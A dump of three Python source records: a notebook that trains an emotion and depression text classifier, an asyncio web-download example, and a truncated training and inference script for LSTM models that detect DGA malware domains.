+{"seq_id": "273872550", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport re\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\nfh=open('isear.txt')\nlabel=[]\nsen=[]\nfor line in fh:\n lis=re.findall('[a-zA-Z]+',line)\n label.append(lis[0])\n sen.append(' '.join(lis[1:]))\n \n\n\n# In[3]:\n\n\nprint(label)\n\n\n# In[4]:\n\n\nprint(sen)\n\n\n# In[5]:\n\n\nimport csv\n\n\n# In[6]:\n\n\nwith open ('data2.csv','w') as f:\n writer=csv.writer(f)\n writer.writerows(zip(label,sen))\n\n\n# In[7]:\n\n\ndf=pd.read_csv('data2.csv')\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\ndf.rename(columns={'ID':'label','CITY COUN SUBJ SEX AGE RELI PRAC FOCC MOCC FIEL EMOT WHEN LONG INTS ERGO TROPHO TEMPER EXPRES MOVE EXP EXP EXP PARAL CON EXPC PLEA PLAN FAIR CAUS COPING MORL SELF RELA VERBAL NEUTRO Field Field Field MYKEY SIT STATE':'sentence'},inplace=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[10]:\n\n\ndf.head()\n\n\n# In[11]:\n\n\ndf.isnull().sum()\n\n\n# In[ ]:\n\n\n\n\n\n# In[12]:\n\n\n'''\nNot using NLTK as Spacy is more faster and accurate in Lemmatization and removing stop words.\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n setence=sentence.split()\n ws=WordLemmatizer()\n sentence=[ws.lemmatize(s) for s in sentence if not s in stopwords.words('english')]\n sentence=' '.join(sentence)\n corpus.append(sentence)'''\n\n\n# In[13]:\n\n\n\nimport spacy\nnlp=spacy.load('en_core_web_sm')\n\n\n# In[14]:\n\n\nprint(nlp.Defaults.stop_words)\n\n\n# In[ ]:\n\n\n\n\n\n# In[15]:\n\n\n# Removing stop words\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[16]:\n\n\ncorpus\n\n\n# In[17]:\n\n\n#Lemmatization\ncorpus2=[]\nfor i in range(7666):\n sent=nlp(corpus[i])\n \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[18]:\n\n\ncorpus2\n\n\n# In[19]:\n\n\ndf.head()\n\n\n# In[20]:\n\n\ndf['cleaned_sentence']=corpus2\n\n\n# In[21]:\n\n\ndf.head()\n\n\n# In[22]:\n\n\ndf.label.value_counts()\n\n\n# In[23]:\n\n\n#WordCloud Analysis\n\n\n# In[24]:\n\n\nget_ipython().system('pip install wordcloud')\nfrom wordcloud import WordCloud\nimport matplotlib.cm\nimport matplotlib.pyplot as plt\n\n\n# In[25]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'sadness']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[26]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'joy']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[27]:\n\n\ndf['emotion'] = df['label'].apply(lambda c: 'Positive' if c =='sadness' else 'Negative')\n\n\n# In[28]:\n\n\ndf['emotion'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[29]:\n\n\ndf5=pd.read_csv('sentiment_tweets3.csv')\n\n\n# In[30]:\n\n\ndf5.head()\n\n\n# In[31]:\n\n\ndf5 = df5.drop(['Unnamed: 
0'],axis=1)\n\n\n# In[32]:\n\n\ndf5.label.value_counts()\n\n\n# In[33]:\n\n\ndf5\n\n\n# In[34]:\n\n\ndf5=df5.iloc[6000:]\n\n\n# In[35]:\n\n\ndf5.info()\n\n\n# In[36]:\n\n\ncorpus=[]\nfor i in range(6000,10314):\n sentence=re.sub('[^a-zA-Z]', ' ',df5['message'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[37]:\n\n\ncorpus2=[]\nfor i in corpus:\n sent=nlp(i) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[38]:\n\n\nlen(corpus2)\n\n\n# In[39]:\n\n\ndf5['cleaned_sentence']=corpus2\n\n\n# In[40]:\n\n\ndf5=df5[['label','message','cleaned_sentence']]\n\n\n# In[41]:\n\n\ndf5.head()\n\n\n# In[42]:\n\n\ndf.head()\n\n\n# In[43]:\n\n\ndf5.rename(columns={'message':'sentence'},inplace=True)\n\n\n# In[44]:\n\n\ndf3=df5[df5['label']>=0]\n\n\n# In[45]:\n\n\ndf3.info()\n\n\n# In[46]:\n\n\ndf.info()\n\n\n# In[47]:\n\n\ndf4=df.append(df3)\n\n\n# In[48]:\n\n\ndf4.head()\n\n\n# In[49]:\n\n\ndf4['emotion'] = df4['label'].apply(lambda c: 'Positive' if c !=0 and c!='joy' else 'Negative')\n\n\n# In[50]:\n\n\ndf4.info()\n\n\n# In[51]:\n\n\ndf4['emotion'].value_counts()\n\n\n# In[52]:\n\n\ndf4.info()\n\n\n# In[53]:\n\n\ndf4.to_csv('cleaned_data.csv')\n\n\n# In[54]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n\nX = df4['cleaned_sentence']\ny = df4['emotion']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=42)\n\n\n# In[55]:\n\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC\n\ntext_clf = Pipeline([('tfidf', TfidfVectorizer()),\n ('clf', LinearSVC()),\n])\n\n# Feed the training data through the pipeline\ntext_clf.fit(X_train, y_train) \n\n\n# In[56]:\n\n\ndef process(str):\n corpus=[]\n \n sentence=re.sub('[^a-zA-Z]', ' ',str)\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n \n \n \n sent=nlp(sentence) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n return(sentence2)\n\n\n# In[57]:\n\n\nstring=str(input(\"Enter Message :\"))\nstring2=process(string) \nz=pd.Series(string2)\npredictions = text_clf.predict(z)\npredictions\n\n\n# In[58]:\n\n\npredictions2=text_clf.predict(X_test)\nfrom sklearn import metrics\nprint(metrics.confusion_matrix(y_test,predictions2))\n\n\n# In[59]:\n\n\nprint(metrics.classification_report(y_test,predictions2))\n\n\n# \n\n# In[60]:\n\n\nprint(metrics.accuracy_score(y_test,predictions2))\n\n\n# In[62]:\n\n\ndepressive_words = ' '.join(list(df4[df4['emotion'] == 'Negative']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=\"Set1\").generate(depressive_words)\nplt.figure(figsize = (10,8), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n", "sub_path": "DepressionAnalysis.py", "file_name": "DepressionAnalysis.py", "file_ext": "py", "file_size_in_byte": 6208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "spacy.load", "line_number": 114, "usage_type": 
"call"}, {"api_name": "re.sub", "line_number": 135, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 212, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 224, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 265, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 309, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 435, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 445, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 446, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 459, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 479, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 489, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 489, "usage_type": "name"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 495, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 495, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 503, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 503, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.imshow", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 514, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 515, "usage_type": "name"}]}
+{"seq_id": "168121368", "text": "import asyncio\nimport aiohttp\n\nasync def download(visits, site):\n count = 0\n for _ in range(visits):\n print(f\"downloading {site}\")\n async with aiohttp.ClientSession() as session:\n async with session.get(site) as response:\n html = await response.text()\n count += len(html)\n message = f\"{site} returned {count//1000}K characters\"\n return message\n\nasync def main():\n # note each download yields immediately so that other downloads \n # can run in parallel. main waits until all results are available\n response = await asyncio.gather(\n download(15, \"http://ibm.com\"),\n download(20, \"http://bbc.co.uk\"),\n download(25, \"http://abc.com\")\n )\n print(response)\n \nasyncio.run(main())\n\n", "sub_path": "src/17 Threading and Concurrency/AsyncIO/07.futures.py", "file_name": "07.futures.py", "file_ext": "py", "file_size_in_byte": 780, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 8, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "245138893", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Libraries\nimport os\nimport argparse\nimport sys\nimport time\nimport json\nimport re\nimport numpy as np\nimport pandas as pd\nimport statistics as stat\nimport lstm_binary\nimport lstm_multiclass\nfrom pprint import pprint\nfrom datetime import datetime\nfrom shutil import copy2\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\n# constants\nmodels_path = '../data/local/models/'\ndata_path = '../data/local/staging/'\n\nREFPATH = \"./\"\nPROJECT_ROOT = \"/Users/nscsekhar/Desktop/nscsekhar/Desktop/Surya/Personal/MIDS/W210/Project/team_cyber/\"\nMULTI_TOKENIZER_FILE = PROJECT_ROOT + \"saved_models/multiclass_tokenizer.pkl\"\nMULTI_CATEGORIES_FILE = PROJECT_ROOT + \"saved_models/multiclass_categories.pkl\"\nMULTI_MODEL_JSON = PROJECT_ROOT + \"saved_models/multiclass_LSTM.json\"\nMULTI_MODEL_H5 = PROJECT_ROOT + \"saved_models/multiclass_LSTM.h5\"\n\n\ndef valid_filename(filename, path=''):\n '''valid_filename: determines if the given filename is a real file. Assumes that the file is in the current working directory for the program.\n\n returns: given file name\n '''\n if path == '':\n path = os.getcwd()+'/'\n\n if not os.path.isfile(path+filename):\n msg = \"The given file '{}' does not exist at '{}'.\".format(\n filename,\n path\n )\n raise argparse.ArgumentTypeError(msg)\n\n return filename\n\n\ndef parse_args():\n '''parse_args: parse command line arguments\n\n return: dictionary of arguments\n '''\n parser = argparse.ArgumentParser(\n description='Runs models either in train or inference mode.',\n prog='models',\n epilog='Models requires at least one of -t/--train or -i/--inference to operate correctly. Both may be provided for sequential analysis.')\n parser.add_argument('config_file',\n type=valid_filename,\n metavar='CONFIG_FILE',\n help=\"File path to the requex configuration file. File must be in JSON format.\")\n parser.add_argument('-t', '--train',\n metavar='TRAINING_FILE',\n nargs=1,\n help=\"Runs models in training mode. Training will be run on the given file. The training file must be a prepared '.csv' file. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-i', '--inference',\n metavar='INFERENCE_FILE',\n nargs=1,\n help=\"Runs models in inference mode. Inference will be run on the given file. The inference file must be a list of domains separated by carriage returns with no header. The program will search for the file in the models, then staging, and finally downloads directories.\")\n parser.add_argument('-m', '--model', choices=['binary', 'multiclass'],\n metavar='model_type',\n required=True,\n help=\"This required option indicates which type of model is being built or used. Using 'binary' selects a benign/malicious model. Using 'multiclass' will classify the malware family for each malicious classified entry.\")\n\n return vars(parser.parse_args())\n\n\ndef get_config_filename(filename=None):\n '''get_config_filename: returns a verified Requex configuration file name. This function handles the ambiguity around whether the module was called from a shell with command line arguments or if called from another program using the run() function. 
If filename is None, the function assumes that there are command line arguments to parse for it.\n\n return: string; valid filename.\n '''\n if filename is None:\n # get command line arguments\n args = parse_args()\n filename = args['config_file']\n else:\n # filename provided, verify the file exists\n if not os.path.isfile(filename):\n print(\"The given file '{}' does not exist at '{}'.\".format(\n filename,\n os.getcwd()\n ))\n exit(1)\n return filename\n\n\ndef get_config(filename):\n '''get_config: reads the configuration JSON file and stores values in a dictionary for processing.\n\n PRE: assumes the file already exists\n\n return: dict of configuration settings\n '''\n\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n return config\n\n\ndef get_file_date(filename):\n '''get_file_date: extracts file date from file name. File date must be in YYYY-MM-DD format.\n\n returns: datetime object of file date.\n '''\n date = re.search(r'\\d\\d\\d\\d-\\d\\d-\\d\\d|$', filename).group()\n year, month, day = date.split('-')\n return datetime(int(year), int(month), int(day))\n\n\ndef write_to_train_logfile(metrics, logpath, stdout=True):\n '''write_to_train_logfile: writes metadata in the metrics dict to a logfile\n '''\n # constants\n logfile = 'requex_training_log.csv'\n\n # write to logfile\n stamp = datetime.utcnow().strftime('%Y-%m-%d-%H:%M')\n\n # extract the filename\n # filename = os.path.basename(datafile)\n\n if stdout:\n # print(\"info:{:>10} rows: {:>10} malicious, {:>10} benign, a {:>3.3f} ratio\".format(total_rows, malicious_rows, benign_rows, ratio))\n print('info: {}, {}, {}, {:>3.3f}s, {:>3.2f} MB, {} rows: {} malicious, {} benign, {:>3.3f} ratio, {}, {} categories, train rows: {}, test rows: {}, train time: {:>3.3f}s, inference time: {:>3.3f}s'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n with open(logpath+logfile, 'at') as log:\n log.write('{}, {}, {}, {:>3.3f}, {:>3.2f}, {}, {}, {}, {:>3.3f}, {}, {}, {}, {}, {:>3.3f}, {:>3.3f}\\n'.format(\n stamp, metrics['filename'], metrics['filedate'], metrics['time'], metrics['memory'], metrics['total_rows'], metrics['malicious_rows'], metrics['benign_rows'], metrics['ratio'], metrics['model'], metrics['categories'], metrics['train_rows'], metrics['test_rows'], metrics['train_time'], metrics['inference_time']))\n\n\ndef copy_models(src, dst):\n '''copy_models: copies the source file (src) to the dst directory. src must be a file and dst must be a directory.\n '''\n # check to see if a directory for the dst directory exists\n if not os.path.isdir(dst):\n # directory does not exist, create it\n os.mkdir(dst)\n\n # verify whether the source and destination are the same\n src_path, filename = os.path.split(src)\n if os.path.isfile(dst+filename):\n print(\"A file by the name '{}' already exists. File not copied. 
Processing will continue using the file already in the '{}' directory.\".format(filename, dst))\n elif os.path.isfile(src):\n copy2(src, dst)\n else:\n print(\"The given file '{}' does not exist.\".format(src))\n exit(1)\n\n\ndef get_training_data(filename, metrics, logpath):\n '''get_training_data: reads the csv file into a pandas dataframe\n\n return: pandas dataframe\n '''\n # constants\n MB = 1024*1024\n\n start_time = time.time()\n df = pd.read_csv(filename,\n sep=',',\n parse_dates=[0],\n dtype={1: int, 2: str, 3: str},\n engine='c')\n end_time = time.time()\n read_time = end_time - start_time\n\n # calculate the memory footprint of the dataframe\n memory = sys.getsizeof(df)/MB\n\n filedate = get_file_date(filename)\n total = df.shape[0]\n benign = df.loc[df['dga'] == 0].shape[0]\n malicious = df.loc[df['dga'] == 1].shape[0]\n ratio = malicious / benign\n\n # write to logfile\n # write_to_train_logfile(logpath, filename, filedate.strftime('%Y-%m-%d'), read_time, memory, total, malicious, '2',benign, ratio)\n metrics = {\n 'filename': filename,\n 'filedate': filedate.strftime('%Y-%m-%d'),\n 'time': read_time,\n 'memory': memory,\n 'total_rows': total,\n 'malicious_rows': malicious,\n 'benign_rows': benign,\n 'ratio': ratio,\n 'categories': 0,\n 'model': 'unknown',\n 'train_rows': 0,\n 'test_rows': 0,\n 'train_time': 0,\n 'inference_rows': 0,\n 'inference_time': 0,\n 'inference_time_mean': 0.0\n }\n\n return df, metrics\n\n\ndef prep_training_dataset_binary(df):\n '''prep_training_dataset_binary: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test\n '''\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the category index.\n X = df['domain']\n Y = df['dga']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test\n\n\ndef prep_training_dataset_multiclass(df, categories_file):\n '''prep_training_dataset_multiclass: creates X, Y datasets for training and testing.\n\n returns: pandas dataframe x4: X_train, X_test, Y_train, Y_test and the number of uniques\n '''\n\n # factorize the malware column\n df['catIndex'], uniques = pd.factorize(df['malware'], sort=True)\n\n # display factorized values\n # print('malware uniques: total - {}\\n{}'.format(len(uniques), uniques))\n # print('catIndex uniques: {}'.format(\n # pd.unique(df['catIndex'].sort_values())))\n\n # record the categories to disk\n with open(categories_file, 'wb') as f:\n pickle.dump(uniques, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n # create X, Y dataframes. X = 'domain' and the model will try to\n # predict Y the category index.\n X = df['domain']\n Y = df['catIndex']\n\n X_train, X_test, Y_train, Y_test = train_test_split(\n X, Y, test_size=0.2, random_state=23)\n\n return X_train, X_test, Y_train, Y_test, len(uniques)\n\n\ndef get_model_info(model_type, config):\n '''get_model_info: returns a dictionary with key value pairs of model file keys and model file names. 
The model file names are full path names anchored to the root_dir and placed in the models directory.\n\n    model_type: a string indicating the type of model ('binary' or 'multiclass')\n    config: a dict filled with configuration parameters\n\n    return: dict of model:filename pairs\n    '''\n\n    if model_type == 'binary':\n        model = config['binary_model']\n    elif model_type == 'multiclass':\n        model = config['multiclass_model']\n    else:\n        # this branch shouldn't happen with the way parse_args() is written\n        msg = \"error: unsupported model type '{}'.\".format(model_type)\n        raise argparse.ArgumentTypeError(msg)\n\n    root_dir = config['root_dir']\n    models_dir = config['models_dir']\n\n    model = {\n        'model_json': root_dir+models_dir+model['model_json'],\n        'model_H5': root_dir+models_dir+model['model_H5'],\n        'model_tokenizer': root_dir+models_dir+model['model_tokenizer'],\n        'model_categories': root_dir+models_dir+model['model_categories'],\n        'model_algorithm': model['model_algorithm']\n    }\n\n    return model\n\n\ndef find_file(filename, config):\n    '''find_file: looks for the file in the models, staging, and downloads directories.\n\n    return: string of the directory path that contains the file, or an empty string if the file was not found\n    '''\n    root_dir = config['root_dir']\n    downloads_dir = config['downloads_dir']\n    staging_dir = config['staging_dir']\n    models_dir = config['models_dir']\n\n    # look for file in models_dir\n    # look for file in staging_dir\n    # look for file in downloads_dir\n    if os.path.isfile(root_dir+models_dir+filename):\n        return root_dir+models_dir\n    elif os.path.isfile(root_dir+staging_dir+filename):\n        return root_dir+staging_dir\n    elif os.path.isfile(root_dir+downloads_dir+filename):\n        return root_dir+downloads_dir\n    else:\n        return ''\n        # msg = \"The given file '{}' does not exist at any of these locations '{}', '{}', '{}'.\".format(\n        #     filename,\n        #     models_dir,\n        #     staging_dir,\n        #     downloads_dir\n        # )\n        # print(msg)\n        # exit(1)\n\n\ndef get_model_type(model_type):\n    '''get_model_type: evaluates model_type to see if it is a valid option. If model_type is empty, the function will attempt to pull the model type from the command line. This function should mirror the choices in parse_args() for -m/--models.\n\n    return: a string with the model_type; empty string if not correct.\n    '''\n    if model_type == '':\n        args = parse_args()\n        return args['model']\n    elif model_type.lower() == 'binary':\n        return 'binary'\n    elif model_type.lower() == 'multiclass':\n        return 'multiclass'\n    else:\n        return ''\n\n\ndef get_train_file(filename, config):\n    '''get_train_file: evaluates the filename as well as command line arguments to get the training file name. 
Verifies that the training file exists.\n\n    returns: string of a filename or empty string if not valid.\n    '''\n    root_dir = config['root_dir']\n    models_dir = config['models_dir']\n\n    if filename == '':\n        # no filename provided, attempt to get it from the command line\n        # parameters\n        args = parse_args()\n        train_file = args['train']\n        if train_file is not None:\n            # extract the filename from the parameter list\n            train_file = train_file[0]\n            location = find_file(train_file, config)\n            if location == '':\n                # file was not found\n                return ''\n            else:\n                copy_models(location+train_file, root_dir+models_dir)\n                return root_dir+models_dir+train_file\n        else:\n            # the command line parameter for train_file was also None\n            return ''\n    else:\n        # filename was provided\n        location = find_file(filename, config)\n        if location == '':\n            # file was not found\n            return ''\n        else:\n            copy_models(location+filename, root_dir+models_dir)\n            return root_dir+models_dir+filename\n\n\ndef get_inference_file(filename, config):\n    '''get_inference_file: evaluates the filename as well as command line arguments to get the inference file name. Verifies that the inference file exists.\n\n    returns: string of a filename or empty string if not valid.\n    '''\n    root_dir = config['root_dir']\n    models_dir = config['models_dir']\n\n    if filename == '':\n        # no filename provided, attempt to get it from the command line\n        # parameters\n        args = parse_args()\n        inference_file = args['inference']\n        if inference_file is not None:\n            # extract the filename from the parameter list\n            inference_file = inference_file[0]\n            location = find_file(inference_file, config)\n            if location == '':\n                # file was not found\n                return ''\n            else:\n                copy_models(location+inference_file, root_dir+models_dir)\n                return root_dir+models_dir+inference_file\n        else:\n            # the command line parameter for inference_file was also None\n            return ''\n    else:\n        # filename was provided\n        location = find_file(filename, config)\n        if location == '':\n            # file was not found\n            return ''\n        else:\n            copy_models(location+filename, root_dir+models_dir)\n            return root_dir+models_dir+filename\n\n\ndef load_inference_data(filename):\n    '''load_inference_data: reads data from the given filename. The file must be a text file with '\\n' at the end of each entry, one entry per line.\n\n    returns: list of data to be analyzed\n    '''\n    domains = []\n    with open(filename, 'rt', newline='\\n') as f:\n        lines = f.readlines()\n\n    for line in lines:\n        domains.append(line.strip())\n\n    return domains\n\n\ndef write_predictions(domains, predictions, model_type, model_algo, version, config):\n    '''write_predictions: takes a 1-D list of domains and predictions and writes them to the inference file output. 
The file name will be '<model_type><model_algo>_predictions_YYYY-MM-DD_v<version>.csv'.\n    '''\n\n    # create filename\n    root_dir = config['root_dir']\n    models_dir = config['models_dir']\n\n    # get the current date and time:\n    datestamp = time.strftime('%Y-%m-%d', time.gmtime())\n    timestamp = time.strftime('%H:%M.%S', time.gmtime())\n\n    output_file = root_dir+models_dir+model_type+model_algo+'_predictions_'+datestamp+'_v'+version+'.csv'\n\n    # write the predictions to disk\n    with open(output_file, 'wt') as f:\n        f.write('creation_date: {} {}\\n'.format(datestamp, timestamp))\n        for i, p in enumerate(predictions):\n            # print('i: {}, p: {}, domains: {}'.format(i, p, domains[i]))\n            f.write('{}, {}\\n'.format(domains[i], p))\n\n\ndef get_version_number(filename):\n    '''get_version_number: extracts the version number from the filename.\n\n    returns: string with a version number in it.\n    '''\n    basename = os.path.basename(filename)\n    reg = re.compile(r'(?:_v\\d+)|$', flags=re.IGNORECASE)\n    return re.search(reg, basename).group()[2:]\n\n\ndef run(config_file=None, model_type='', train_file='', inference_file=''):\n    # get configuration parameters\n    config_file = get_config_filename(config_file)\n    config = get_config(config_file)\n    # print('configuration settings:')\n    # pprint(config)\n\n    # parse function/command line parameters\n    model_type = get_model_type(model_type)\n    train_file = get_train_file(train_file, config)\n    inference_file = get_inference_file(inference_file, config)\n\n    # assemble the path to the log directory\n    root_dir = config['root_dir']\n    models_dir = config['models_dir']\n    logpath = root_dir+models_dir\n\n    if model_type == '':\n        print(\"error: an invalid model type was given. See the -h/--help command line options for valid model choices.\")\n        exit(1)\n\n    if train_file == '' and inference_file == '':\n        print(\"error: neither train nor inference was given as an argument. Please run again, but with either the -t/--train or -i/--inference options (or both) enabled.\")\n        exit(1)\n\n    # get the model information from the configuration file\n    model_info = get_model_info(model_type, config)\n    metrics = {\n        'filename': '',\n        'filedate': '',\n        'time': 0.0,\n        'memory': 0.0,\n        'total_rows': 0,\n        'malicious_rows': 0,\n        'benign_rows': 0,\n        'ratio': 0.0,\n        'categories': 0,\n        'model': 'unknown',\n        'train_rows': 0,\n        'test_rows': 0,\n        'train_time': 0,\n        'inference_rows': 0,\n        'inference_time': 0,\n        'inference_time_mean': 0.0\n    }\n\n    if train_file != '':\n        # a training file was provided\n        model_version = get_version_number(train_file)\n\n        # get training data from disk\n        df, metrics = get_training_data(train_file, metrics, logpath)\n\n        if model_type == 'binary':\n            X_train, X_test, Y_train, Y_test = prep_training_dataset_binary(df)\n            metrics['model'] = model_type\n            metrics['categories'] = 2\n            metrics['train_rows'] = X_train.shape[0]\n            metrics['test_rows'] = X_test.shape[0]\n            # pprint(metrics)\n            print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n            train_model = lstm_binary.LSTMBinary()\n            start_time = time.time()\n            train_model.train(X_train, Y_train)\n            end_time = time.time()\n            train_time = end_time - start_time\n            metrics['train_time'] = train_time\n            print('info: {} – training ended. 
Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n train_model.save(model_info['model_tokenizer'],\n model_info['model_json'],\n model_info['model_H5'])\n\n elif model_type == 'multiclass':\n # create X and Y and split into train and test\n X_train, X_test, Y_train, Y_test, categories = prep_training_dataset_multiclass(\n df, model_info['model_categories'])\n metrics['model'] = model_type\n metrics['categories'] = categories\n metrics['train_rows'] = X_train.shape[0]\n metrics['test_rows'] = X_test.shape[0]\n\n print('info: {} – training started.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime())))\n start_time = time.time()\n train_model = lstm_multiclass.LSTMMulti()\n train_model.train(X_train, Y_train)\n end_time = time.time()\n train_time = end_time - start_time\n metrics['train_time'] = train_time\n print('info: {} – training ended. Train time {:>3.3f}s.'.format(time.strftime('%Y-%m-%d %H:%M.%S', time.gmtime()), train_time))\n write_to_train_logfile(metrics, logpath, True)\n\n 